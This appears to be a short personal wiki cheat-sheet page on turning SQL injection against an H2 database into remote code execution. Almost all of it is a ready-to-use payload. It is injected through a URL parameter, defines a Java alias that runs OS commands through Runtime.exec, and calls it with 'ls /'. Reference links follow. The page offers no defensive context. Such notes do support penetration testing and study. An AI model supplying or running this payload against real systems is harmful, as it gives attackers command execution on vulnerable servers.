java-h2-sqli-rce
H2 SQL injection to RCE
http://localhost:1338/api/note?name=aa';
CREATE ALIAS BOBOB AS 'String e(String cmd) throws java.io.IOException{
try {
java.lang.Runtime rt = java.lang.Runtime.getRuntime();
java.lang.Process proc = rt.exec(cmd);
java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream()));
String line;
StringBuilder output = new StringBuilder();
while ((line = reader.readLine()) != null) {
output.append(line).append("\\n");
}
proc.waitFor();
return output.toString();
} catch (java.io.IOException | InterruptedException e) {
return "Error: " + e.getMessage();
}
}';
CALL BOBOB('ls /');--
Relevant reading: https://www.ctfiot.com/147512.html https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2
java-h2-sqli-rce.txt · Last modified: 2024/12/02 22:30 by osorin